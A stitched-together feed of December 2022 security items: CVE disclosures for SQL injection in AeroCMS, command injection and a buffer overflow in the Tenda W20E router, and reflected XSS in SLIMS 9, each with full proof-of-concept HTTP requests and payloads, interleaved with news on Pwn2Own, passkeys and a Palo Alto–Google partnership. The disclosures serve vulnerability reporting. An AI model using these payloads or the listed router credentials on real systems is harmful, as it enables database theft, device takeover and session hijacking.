The approve parameter from the AeroCMS-v0.0.1 CMS system is vulnerable to SQL injection attacks.

Permalink

Cannot retrieve contributors at this time

**view\_all\_comments\_update**

The approve parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Comments -> Approve.

**Exploit**

Query out the current user

**Vulnerable Code**

    admin/includes/view_all_comments.php
    

The approve parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    UPDATE comments SET comment_status = 'approved' WHERE comment_id = 3 and extractvalue(0,concat(0x7e,user())) LIMIT 1
    

**POC**

*   Injection Point

    approve=3+and+extractvalue(0,concat(0x7e,user()))
    

*   Request

    GET /AeroCMS-0.0.1/admin/comments.php?approve=3+and+extractvalue(0,concat(0x7e,user())) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/comments.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46051: CVE/view_all_comments_update.MD at master · rdyx0/CVE

Enterprises can now adopt the industry's most comprehensive Zero Trust Network Access 2.0 to secure access to all applications from any device.

**SANTA CLARA, Calif.****,** **Dec. 13, 2022** **/PRNewswire/ —** In a world where work is now an activity not a place, organizations need to connect a distributed workforce without compromising on security and user experience. Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, today announced an expanded partnership that brings together BeyondCorp Enterprise from Google Cloud and Prisma® Access from Palo Alto Networks to provide hybrid users secure and seamless access to applications - SaaS, cloud or on-premise - from managed or unmanaged devices.

Built on the backbone of the Google Cloud network, this comprehensive cloud-delivered Zero Trust Network Access (ZTNA) 2.0 solution enables all users to work securely from anywhere regardless of device type. With Prisma Access, customers get superior ZTNA 2.0 security for all devices, branch offices and applications. BeyondCorp Enterprise Essentials enables secure access to applications and resources for unmanaged devices. Combined threat intelligence and machine learning (ML) automatically detects and remediates threats to users, applications or enterprise data; all powered by the superior performance, planetary reach, and low-latency connections of Google Cloud.

"Legacy VPN and Zero Trust Network Access (ZTNA) 1.0 solutions provide access to users that is too broad and lacks continuous security inspection, putting cloud-first and hybrid organizations at risk," said Kumar Ramchandran, SVP, Products for Palo Alto Networks. "ZTNA 2.0 by Palo Alto Networks secures the modern hybrid enterprise. This partnership will allow organizations to benefit from the performance, scale, and reliability offered by Google Cloud's global network, coupled with the security expertise of Palo Alto Networks" 

"Together with Prisma Access and BeyondCorp, customers will now have seamless access to a Zero Trust security solution built for today's workforce, powered by Google Cloud's innovation, scale, and trusted cloud infrastructure," said Sunil Potti, VP/GM, Cloud Security at Google Cloud. "At Google Cloud, we continue to deliver opinionated solutions with our customers' needs in mind, bringing together innovations from across Google and its ecosystem of partners in easy-to-consume offerings that are backed by Google's unique scale and deep experience."

Palo Alto Networks Prisma Access platform helps transform networking and security to deliver a true Zero Trust that supports both managed and unmanaged devices while delivering consistent protections across the entire enterprise. The industry's only ZTNA 2.0 solution provides deep and ongoing inspection of all application traffic, even for allowed connections to prevent all threats, including zero-day threats, providing secure access for data centers, branch offices and mobile users. Prisma Access is purpose-built on Google's global backbone to secure enterprises at cloud scale.

BeyondCorp Enterprise is based on Google's years of experience with zero trust and provides organizations with a seamless and secure experience for anyone who needs to access applications, cloud resources, and private data hosted on Google Cloud, in third-party clouds, or on-premises. BeyondCorp Enterprise leverages Chrome to provide a secure enterprise browsing solution where agents cannot be installed on devices, providing a simple, yet secure zero trust approach for unmanaged devices.

**About Palo Alto Networks**

Palo Alto Networks, the global cybersecurity leader, is shaping the cloud-centric future with technology that is transforming the way people and organizations operate. Our mission is to be the cybersecurity partner of choice, protecting our digital way of life. We help address the world's greatest security challenges with continuous innovation that seizes the latest breakthroughs in artificial intelligence, analytics, automation, and orchestration. By delivering an integrated platform and empowering a growing ecosystem of partners, we are at the forefront of protecting tens of thousands of organizations across clouds, networks, and mobile devices. Our vision is a world where each day is safer and more secure than the one before. For more information, visit www.paloaltonetworks.com.

Google Cloud and Palo Alto Networks Team to Protect the Modern Workforce

AeroCMS v0.0.1 is vulnerable to SQL Injection via the delete parameter.

**categories\_delete\_sql\_injection**

The delete parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Categories-> Delete.

**Exploit**

The first character of the current database is ord('a'), which is chr(97), delay

**Vulnerable Code**

    AeroCMS-0.0.1\admin\categories.php
    

Use the deleteCategories() function

Traced to the 'admin/functions.php' file

The delete parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    DELETE FROM categories WHERE cat_id = 3 RLIKE (SELECT 5646 FROM (SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))=97,3,0)))))XOyv) LIMIT 1
    

**POC**

*   Injection Point

    delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv)
    

*   Request

    GET /AeroCMS-0.0.1/admin/categories.php?delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/categories.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46047: CVE/categories_delete_sql_injection.md at master · rdyx0/CVE

By Habiba Rashid
The Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023.
This is a post from HackRead.com Read the original post: Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

Previously **we reported** on the results from Pwn2Own Toronto for Day 1 and Day 2 and today we will be talking about the proceedings of the last two days of the contest. Without further ado, let’s get right into it.

**Pwn2Own Day 3**

On December 08, 2022, the first success of the day went to Team Viettel which earned $20,000 for their execution of an OS Command Injection attack against the WD My Cloud PRO SERIES PR4 100 in the NAS category. 

A newcomer Chi Tran of team Bun Bo Ong Chi executed their stack-based buffer overflow attack against the Canon image CLASS MF74Cdw in the Printer category and was rewarded $10,000 for their hack.

Team DEVCORE on the other hand, used one unique and one previously used bug against the Sonos One Speaker in the Smart Speaker category, earning $22,500. 

NCC Group’s representative team earned $50,000 for hacking a Ubiquiti router and a Lexmark printer in the SOHO Smashup category. The Star Labs team earned $25,000 for an attack targeting a Synology router and a Canon printer. Team Viettel was awarded $37,500 for a hack involving a Cisco router and a Canon printer.

For only the Samsung Galaxy S22 exploits throughout the event, the contestants earned a total of $125,000. Google and Apple phones were not targeted. 

By the end of the third day of the competition, a total of $934,750 had been awarded to the contestants for their successful hacks.

**Watch as Hackers Hack at Pwn2Own**

**Pwn2Own Day 4**

On December 09, 2022, on the fourth day, ZDI, the organization behind Pwn2Own, awarded another $55,000, bringing the total contest prize money to $989,750. 63 unique zero days were purchased during the four-day contest. 

The Master of Pwn title was awarded to the DEVCORE team for their winnings of $142,500 and 18.5 points. Team Viettel and NCC Group followed close behind with 16.5 and 15.5 points respectively. 

Out of the 11 attempts scheduled for the last day of the contest, targeting printers and routers, only 3 were successful since the others either failed or used bugs previously reported in the event. 

The first victory went to Chris Anastasion who used a heap-based buffer overflow to exploit the Lexmark printer, earning $10,000. This was followed by ANHTUD Information Security Department earning $10,000 by using another heap-based overflow to exploit the Canon printer. 

The last successful hack of the Pwn2Own Toronto contest was carried out by the namnp team which won $10,000 for their unique bug against the Canon printer.

**Watch as Hackers Hack at Pwn2Own**

With this, the hacking competition came to an end, marking yet another successful Pwn2Own iteration. However, the Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023. It will be an ICS/SCADA-themed event.

1.  **Google Launches Bug Bounty Prog for Open-Source Software**
2.  **Multichain hack: Hacker returns $1m, keeps $150k as bug bounty**
3.  **Xiaomi, Amazon Echo, & Samsung Smart TVs pwned at Pwn2Own**
4.  **Hack the US Army for good with ‘Hack The Army’ bug bounty prog**
5.  **Pwn2Own: Microsoft Exchange server, Teams, Zoom, Chrome pwned**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

Tenda W20E V16.01.0.6(3392) is vulnerable to Command injection via cmd_get_ping_output.

**Tenda W20E Command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is a Command injection vulnerability in tenda W20E V16.01.0.6(3392), which can execute arbitrary command in route system.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function do\_ping\_action:

The program passes the contents obtained by the hostName parameter to hostname.  
There is some filtering of parameters is judged by if, but we can bypass it, which is explained in the next section.  
Then, copy the content of hostname through the strncpy function into cfg.hostname.  
And cfg is called by function cmd\_get\_ping\_output().  
In function cmd\_get\_ping\_output：

Then, format the matching content of cfg.hostname through the snprintf function into new\_cmd\_buf.  
The new\_cmd\_buf is called by popen().  
There is a command injection vulnerability.  
The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack. In the judgment of If, you can see that the characters(; | &) are filtered, and if these characters are included, code will goto fail. But we can use '$' to do Command injection.  
 The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668695093889 HTTP/1.1
Host: 192.168.0.1
Content-Length: 87
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=70ebc4f9c9d22827a5874d1bb6f06abddwdvmy; bLanguage=cn; sessionid=W20Ev5:0.167.3:6b0846
Connection: close

{"setFixTools":{"networkTool":1,"hostName":"test$(touch /tmp/test0)","packageSize":32}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

Figure shows POC attack effect, the file test0 is created.

**CVE-ID**

unsigned

CVE-2022-45996: public_bug/tenda/w20e/2 at main · bugfinder0/public_bug

Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow.

**Tenda W20E Buffer overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is an buffer overflow vulnerability in tenda W20E V16.01.0.6(3392), which can cause httpd to crash and restart.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function formSetPortMirror, the corresponding function field is setPortMirror.

In function formSetPortMirror:

The program passes the contents obtained by the portMirrorMirroredPorts parameter to pMirroredPorts.  
Then, format the matching content of pMirroredPorts through the sprintf function into sMibValue.  
There is no size check, so there is a vulnerability that can cause buffer overflow through portMirrorMirroredPorts field.

The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack.

The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668753675738 HTTP/1.1
Host: 192.168.0.1
Content-Length: 95
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: curShow=; bLanguage=cn; sessionid=W20Ev5:0.133.2:f012ed
Connection: close

{"setPortMirror":{"portMirrorEn":true,"portMirrorLanPort":4,"portMirrorMirroredPorts":"1,0,0a\*200"}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

And attack twice:

Figure shows POC attack effect, the binary httpd restarts, because the process id changed.

**CVE-ID**

unsigned

CVE-2022-45997: public_bug/tenda/w20e/1 at main · bugfinder0/public_bug

Google has officially begun rolling out support for passkeys, the next-generation passwordless login standard, to its stable version of Chrome web browser.
"Passkeys are a significantly safer replacement for passwords and other phishable authentication factors," the tech giant's Ali Sarraf said. "They cannot be reused, don't leak in server breaches, and protect users from phishing attacks."
The

Google has officially begun rolling out support for passkeys, the next-generation passwordless login standard, to its stable version of Chrome web browser.

"Passkeys are a significantly safer replacement for passwords and other phishable authentication factors," the tech giant's Ali Sarraf said. "They cannot be reused, don't leak in server breaches, and protect users from phishing attacks."

The improved security feature, which is available in version 108, comes nearly two months after Google began testing the option across Android, macOS, and Windows 11.

Passkeys obviate the need for passwords by requiring users to authenticate themselves during sign in by unlocking their nearby Android or iOS device using biometrics. This, however, calls for websites to build passkey support on their sites using the WebAuthn API.

Essentially, the technology works by creating a unique cryptographic key pair to associate with an account for the app or website during account registration. One of these keys, the public key, is stored in the server. The private key, on the other hand, never leaves the device in which the keys were generated.

On Android, the "keys" are uploaded to Google Password Manager (or a third party like 1Password or Dashlane) to prevent lockouts. Passkeys are synced via iCloud Keychain on iOS and macOS, while Microsoft Windows is set to offer support in 2023.

"When a passkey is backed up, its private key is uploaded only in its encrypted form using an encryption key that is only accessible on the user's own devices," Google software engineer Arnar Birgisson previously noted in October 2022.

The idea is to protect the passkeys from Google such that a rogue actor inside the company cannot use them to log in to its corresponding online service without access to the private key.

The internet and advertising company is also expected to make available a new API to provide passkeys support for Android apps.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Adds Passkey Support to Chrome for Windows, macOS and Android

Categories: News
Tags: Lock and Code S03E25

Tags:  lock and code

Tags:  S03E25

Tags:  Dustin Childs

Tags:  Eufy

Tags:  Snapchat

Tags:  Apple

Tags:  Apple AirTag

Tags:  Google Chrome

Tags:  V8 vulnerability

Tags:  Hive

Tags:  Facebook hoax

Tags:  PayPal phish

Tags:  Lazarus Group

Tags:  SIM swapper

Tags:  festive scam

Tags:  holiday scams

Tags:  Android vulnerability

Tags:  Bluetooth

Tags:  SaaS

Tags:  SaaS best practices

Tags:  Epic Games

Tags:  Threat Intelligence Reports

The most interesting security related news from the week of December 5 to 11.



(Read more...)




The post A week in security (December 5 - 11) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (December 5 - 11)

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9Multiple XSS-Reflected vulnerabilities## Author: nu11secur1ty## Date: 12.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0## Description:The value of the keywords request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks.The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhcwas submitted in the keywords parameter.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhcHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhjuUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywnSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Fri, 09 Dec 2022 06:23:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 29492<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>        <meta name="description" content="Open Source LibraryManagement System | Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)## Proof and Exploit:[href](https://streamable.com/ac60v3)## Time spent`01:00:00`

Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 